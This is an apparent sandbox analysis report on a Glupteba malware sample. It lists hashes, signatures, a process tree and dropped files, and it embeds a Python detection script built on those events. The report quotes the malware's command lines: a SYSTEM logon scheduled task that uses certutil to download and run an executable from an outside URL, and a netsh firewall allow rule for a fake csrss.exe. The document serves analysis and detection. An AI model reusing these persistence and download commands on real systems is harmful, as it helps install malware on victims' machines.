Analysis
- max time kernel: 15s
- max time network: 148s
- platform: windows7_x64
- resource: win7-20220414-en
- submitted: 24-05-2022 22:07

Static task: static1
Behavioral task: behavioral1
- Sample: 59fea5e1012febef552be4ad0cac971bd335783c49600471fcc6e8d2bc4fb410.exe
- Resource: win7-20220414-en
General
- Target: 59fea5e1012febef552be4ad0cac971bd335783c49600471fcc6e8d2bc4fb410.exe
- Size: 3.8MB
- MD5: be737bbd92519d634ee9f64ec3b921a9
- SHA1: 2f774c2aa118105f6c01a612323a36b130703616
- SHA256: 59fea5e1012febef552be4ad0cac971bd335783c49600471fcc6e8d2bc4fb410
- SHA512: 41a0842892b1e9ba3fd4a776b6427539ca2f5907887ca6fc5d6e0c0f43b8a4354bebe0a005cde572d8a65871cf8167ec5fc3a31c1f159cfef443f07d657309e5
Malware Config
Signatures

Glupteba Payload (2 IoCs)
resource | yara_rule
behavioral1/memory/1940-56-0x0000000001600000-0x0000000001CF5000-memory.dmp | family_glupteba
behavioral1/memory/1940-57-0x0000000000400000-0x0000000000FE5000-memory.dmp | family_glupteba

Modifies Windows Firewall (1 TTPs)

Modifies boot configuration data using bcdedit (1 IoCs)
pid | process
1440 | bcdedit.exe

Drops file in Windows directory (1 IoCs)
description | ioc | process
File created | C:\Windows\Logs\CBS\CbsPersist_20220525000917.cab | makecab.exe

Creates scheduled task(s) (1 TTPs, 2 IoCs)
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid | process
1812 | schtasks.exe
1744 | schtasks.exe

Modifies data under HKEY_USERS (1 IoCs)
description | ioc | process
Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 | netsh.exe

Suspicious behavior: EnumeratesProcesses (2 IoCs)
pid | process
1940 | 59fea5e1012febef552be4ad0cac971bd335783c49600471fcc6e8d2bc4fb410.exe
1704 | 59fea5e1012febef552be4ad0cac971bd335783c49600471fcc6e8d2bc4fb410.exe

Suspicious use of AdjustPrivilegeToken (2 IoCs)
description | pid | process
Token: SeDebugPrivilege | 1940 | 59fea5e1012febef552be4ad0cac971bd335783c49600471fcc6e8d2bc4fb410.exe
Token: SeImpersonatePrivilege | 1940 | 59fea5e1012febef552be4ad0cac971bd335783c49600471fcc6e8d2bc4fb410.exe

Suspicious use of WriteProcessMemory (7 IoCs)
description | pid | process | target process
PID 1704 wrote to memory of 1064 | 1704 | 59fea5e1012febef552be4ad0cac971bd335783c49600471fcc6e8d2bc4fb410.exe | cmd.exe
PID 1704 wrote to memory of 1064 | 1704 | 59fea5e1012febef552be4ad0cac971bd335783c49600471fcc6e8d2bc4fb410.exe | cmd.exe
PID 1704 wrote to memory of 1064 | 1704 | 59fea5e1012febef552be4ad0cac971bd335783c49600471fcc6e8d2bc4fb410.exe | cmd.exe
PID 1704 wrote to memory of 1064 | 1704 | 59fea5e1012febef552be4ad0cac971bd335783c49600471fcc6e8d2bc4fb410.exe | cmd.exe
PID 1064 wrote to memory of 1692 | 1064 | cmd.exe | netsh.exe
PID 1064 wrote to memory of 1692 | 1064 | cmd.exe | netsh.exe
PID 1064 wrote to memory of 1692 | 1064 | cmd.exe | netsh.exe
Processes
(indentation shows the parent/child depth as reported by the sandbox)

C:\Users\Admin\AppData\Local\Temp\59fea5e1012febef552be4ad0cac971bd335783c49600471fcc6e8d2bc4fb410.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\59fea5e1012febef552be4ad0cac971bd335783c49600471fcc6e8d2bc4fb410.exe"
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken

  C:\Users\Admin\AppData\Local\Temp\59fea5e1012febef552be4ad0cac971bd335783c49600471fcc6e8d2bc4fb410.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\59fea5e1012febef552be4ad0cac971bd335783c49600471fcc6e8d2bc4fb410.exe"
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory

    C:\Windows\system32\cmd.exe
      Command line: C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
      - Suspicious use of WriteProcessMemory

    C:\Windows\rss\csrss.exe
      Command line: C:\Windows\rss\csrss.exe ""

      C:\Windows\system32\schtasks.exe
        Command line: schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://gfixprice.space/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F
        - Creates scheduled task(s)

      C:\Windows\system32\schtasks.exe
        Command line: schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
        - Creates scheduled task(s)

      C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
        Command line: "C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"

      C:\Windows\system32\bcdedit.exe
        Command line: C:\Windows\Sysnative\bcdedit.exe /v
        - Modifies boot configuration data using bcdedit

C:\Windows\system32\makecab.exe
  Command line: "C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20220525000917.log C:\Windows\Logs\CBS\CbsPersist_20220525000917.cab
  - Drops file in Windows directory

C:\Windows\system32\netsh.exe
  Command line: netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
  - Modifies data under HKEY_USERS
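The Signatures list and the process tree above record the whole persistence chain in a handful of command lines: an inbound Windows Firewall allow rule for C:\Windows\rss\csrss.exe (a core Windows process name launched from a directory that does not exist on a clean install), two ONLOGON scheduled tasks with /RL HIGHEST (one of them running as SYSTEM and using certutil -urlcache to fetch https://gfixprice.space/app/app.exe into %Temp%), and a bcdedit invocation. One caveat a responder should keep in mind: the bcdedit line is "bcdedit /v", which is the verbose-listing switch; the sandbox signature fires on the bcdedit process itself, not on a proven write to the BCD store. The script below is an added example, not part of this report or of any sandbox's detection logic. It runs simple detection rules over process-creation records (image path plus command line) of the kind Sysmon Event ID 1 or a 4688 event would give you. The sample records are constructed: the first five are the command lines from the tree above, the last is an invented benign scheduled task used for contrast; the lists of system process names, trusted directories and bcdedit write verbs are the author's assumptions for this example.

```python
import re
from pathlib import PureWindowsPath

# Core Windows process names that run legitimately only from System32/SysWOW64. The tree above shows
# the payload as C:\Windows\rss\csrss.exe: a system process name in a non-standard directory (T1036.005).
SYSTEM_PROCESS_NAMES = {"csrss.exe", "smss.exe", "wininit.exe", "winlogon.exe", "services.exe", "lsass.exe"}
SYSTEM_DIRS = {r"c:\windows\system32", r"c:\windows\syswow64"}
TRUSTED_PREFIXES = tuple(SYSTEM_DIRS) + (r"c:\program files",)  # assumption: tune for your estate
USER_WRITABLE_RE = re.compile(r"\\(?:appdata|temp|programdata|users\\public)\\", re.IGNORECASE)
ABS_EXE_RE = re.compile(r'\s*"?([a-z]:\\.*?\.(?:exe|dll|bat|cmd|ps1|vbs|js))(?=["\s]|$)', re.IGNORECASE)
# bcdedit verbs that write the BCD store; /v, /enum and /store only display it, so the "bcdedit /v"
# in the tree above is a listing, not a modification, whatever the sandbox signature name says.
BCDEDIT_WRITE_VERBS = {"/set", "/deletevalue", "/create", "/delete", "/copy", "/import", "/default",
                       "/displayorder", "/bootsequence", "/timeout", "/debug", "/bootdebug", "/dbgsettings"}

# Constructed process-creation records (image path, command line): the first five are copied from the
# process tree above, the last one is an invented benign task for contrast.
SAMPLE_EVENTS = [
    (r"C:\Windows\system32\cmd.exe",
     r'C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"'),
    (r"C:\Windows\rss\csrss.exe", r'C:\Windows\rss\csrss.exe ""'),
    (r"C:\Windows\system32\schtasks.exe",
     r'schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://gfixprice.space/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F'),
    (r"C:\Windows\system32\schtasks.exe",
     r'schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F'),
    (r"C:\Windows\system32\bcdedit.exe", r"C:\Windows\Sysnative\bcdedit.exe /v"),
    (r"C:\Windows\system32\schtasks.exe",
     r'schtasks /CREATE /SC DAILY /TR "C:\Program Files\Vendor\update.exe" /TN VendorUpdate'),
]

def _flag_value(cmdline, flag):
    """Value after a schtasks-style switch, e.g. /TR "..." or /TN name; None if the switch is absent."""
    m = re.search(r"(?<!\S)" + re.escape(flag) + r'\s+(?:"([^"]*)"|(\S+))', cmdline, re.IGNORECASE)
    return None if not m else (m.group(1) if m.group(1) is not None else m.group(2))

def _untrusted_location(text):
    """Text names something under a user-writable dir, or starts with an exe path outside trusted dirs."""
    if USER_WRITABLE_RE.search(text):
        return True
    m = ABS_EXE_RE.match(text)
    return bool(m) and not m.group(1).lower().startswith(TRUSTED_PREFIXES)

def is_masquerading_system_binary(image_path):
    p = PureWindowsPath(image_path.strip('"'))
    return p.name.lower() in SYSTEM_PROCESS_NAMES and str(p.parent).lower() not in SYSTEM_DIRS

def analyze_schtasks(cmdline):
    """Reasons a 'schtasks /CREATE' line looks like malicious persistence (empty list = clean)."""
    if not re.search(r"(?<!\S)/create(?!\S)", cmdline, re.IGNORECASE):
        return []
    reasons = []
    action = _flag_value(cmdline, "/TR") or ""
    schedule = (_flag_value(cmdline, "/SC") or "").upper()
    if (_flag_value(cmdline, "/RU") or "").upper() == "SYSTEM" or (_flag_value(cmdline, "/RL") or "").upper() == "HIGHEST":
        reasons.append("task runs elevated (/RU SYSTEM or /RL HIGHEST)")
    if schedule in {"ONLOGON", "ONSTART"}:
        reasons.append("boot/logon trigger (/SC %s)" % schedule)
    if re.search(r"certutil(?:\.exe)?\s.*-urlcache|https?://", action, re.IGNORECASE):
        reasons.append("task action downloads a payload (certutil -urlcache or a URL in /TR)")
    if _untrusted_location(action):
        reasons.append("task action runs from a user-writable or non-standard directory")
    return reasons

def analyze_firewall_rule(cmdline):
    """Reasons a 'netsh advfirewall firewall add rule' line looks like malware opening itself up."""
    m = re.search(r"netsh\s+advfirewall\s+firewall\s+add\s+rule\b(.*)", cmdline, re.IGNORECASE)
    if not m:
        return []
    args = m.group(1)
    def kv(key):  # value of key=value or key="value" in the netsh argument list ("" if absent)
        mm = re.search(r"(?<!\S)" + key + r'=(?:"([^"]*)"|(\S+))', args, re.IGNORECASE)
        return "" if not mm else (mm.group(1) if mm.group(1) is not None else mm.group(2).strip('"'))
    reasons = []
    if kv("dir").lower() == "in" and kv("action").lower() == "allow":
        reasons.append("inbound allow rule")
    if kv("program") and _untrusted_location(kv("program")):
        reasons.append("allowed program outside trusted directories: " + kv("program"))
    if kv("name").lower() + ".exe" in SYSTEM_PROCESS_NAMES:
        reasons.append("rule named after a core Windows process")
    return reasons

def bcdedit_modifies_store(cmdline):
    """True only when bcdedit is invoked with a verb that writes the boot configuration store."""
    if not re.search(r"bcdedit(?:\.exe)?(?:\s|$)", cmdline, re.IGNORECASE):
        return False
    return bool({tok.lower() for tok in cmdline.split() if tok.startswith("/")} & BCDEDIT_WRITE_VERBS)

def scan(events):
    """Run every rule over (image, command line) records; returns (image, reasons) for each hit."""
    hits = []
    for image, cmdline in events:
        reasons = ["core Windows process name running outside System32 (T1036.005)"] if is_masquerading_system_binary(image) else []
        reasons += analyze_schtasks(cmdline) + analyze_firewall_rule(cmdline)
        if bcdedit_modifies_store(cmdline):
            reasons.append("bcdedit writes the boot configuration store")
        if reasons:
            hits.append((image, reasons))
    return hits
```

Run over the constructed records, scan() flags the cmd.exe wrapper (inbound allow rule, program outside trusted directories, rule named after csrss), the dropped csrss.exe itself (masquerading), and both schtasks lines (elevated, logon trigger, untrusted action, and for ScheduledUpdate the certutil download), while the "bcdedit /v" listing and the invented Program Files task produce nothing. Each rule returns its reasons separately so that a single weak signal such as an elevated task can be down-weighted in a real pipeline without losing the stronger ones.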
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads

C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe

C:\Windows\rss\csrss.exe
- Filesize: 893KB
- MD5: 4523032c8d2caeef06178f3854637376
- SHA1: 28686ee0e0d6776f19326a1222a68543437c1e26
- SHA256: 515d77a416a7cb61ad0125458646ccedd2de49875da1728bb2b2c46919d617ca
- SHA512: 0c85115ced443a096f2ea62025286d4f01dce874ffec58c22ea27b9ebb8ae44083742abbff6e4eb1609c9bf41c05426f5daf4e430c71ebfb1afed644277840d0

\Users\Admin\AppData\Local\Temp\csrss\patch.exe
\Users\Admin\AppData\Local\Temp\csrss\patch.exe
\Users\Admin\AppData\Local\Temp\dbghelp.dll
\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe
\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe
\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe
\Users\Admin\AppData\Local\Temp\osloader.exe
\Users\Admin\AppData\Local\Temp\osloader.exe
\Users\Admin\AppData\Local\Temp\osloader.exe
\Users\Admin\AppData\Local\Temp\symsrv.dll

\Windows\rss\csrss.exe
- Filesize: 1.6MB
- MD5: 58a807deff122b95edeb0586095141f0
- SHA1: 627fc9ac5f2ad5e81bd7d292e568f287014b2fde
- SHA256: c74751e268b059e9341684f5e7f097afa316c04c17d6a2ce7825a19db2598fd3
- SHA512: 308183fbe8046fe66be115a8d2ea2b3f4dccd9624f913dba0499b5f81af9d398c2fb7dd1f99c3b6697da563715f7554ef4d9101c17dd3c50f23142f02efe5229

\Windows\rss\csrss.exe
- Filesize: 2.4MB
- MD5: dc741515f1b67996d40ce6438019ba1d
- SHA1: bdf78779d6d70dfad0dcb8644ca6b049d53453ce
- SHA256: 6c8ff236640f859eac5497e8f0f563dbe79dc3f595199027feae2913302d0d2c
- SHA512: dd9eb39fd211d305adf0da12c73511399edd04db8628b0f204ec745db39ca8c4c2b121574978db7ff3df4d835921961f032b6507efe6773c30a0e819d884fbcc

memory/1064-59-0x0000000000000000-mapping.dmp
memory/1440-83-0x0000000000000000-mapping.dmp
memory/1692-61-0x000007FEFC2E1000-0x000007FEFC2E3000-memory.dmp
- Filesize: 8KB
memory/1692-60-0x0000000000000000-mapping.dmp
memory/1704-63-0x0000000000400000-0x0000000000FE5000-memory.dmp
- Filesize: 11.9MB
memory/1704-62-0x00000000012C0000-0x0000000001666000-memory.dmp
- Filesize: 3.6MB
memory/1704-58-0x00000000012C0000-0x0000000001666000-memory.dmp
- Filesize: 3.6MB
memory/1940-54-0x0000000001250000-0x00000000015F6000-memory.dmp
- Filesize: 3.6MB
memory/1940-57-0x0000000000400000-0x0000000000FE5000-memory.dmp
- Filesize: 11.9MB
memory/1940-56-0x0000000001600000-0x0000000001CF5000-memory.dmp
- Filesize: 7.0MB
memory/1940-55-0x0000000001250000-0x00000000015F6000-memory.dmp
- Filesize: 3.6MB
memory/1952-70-0x0000000000400000-0x0000000000FE5000-memory.dmp
- Filesize: 11.9MB
memory/1952-69-0x00000000011B0000-0x0000000001556000-memory.dmp
- Filesize: 3.6MB
memory/1952-68-0x00000000011B0000-0x0000000001556000-memory.dmp
- Filesize: 3.6MB
memory/1952-66-0x0000000000000000-mapping.dmp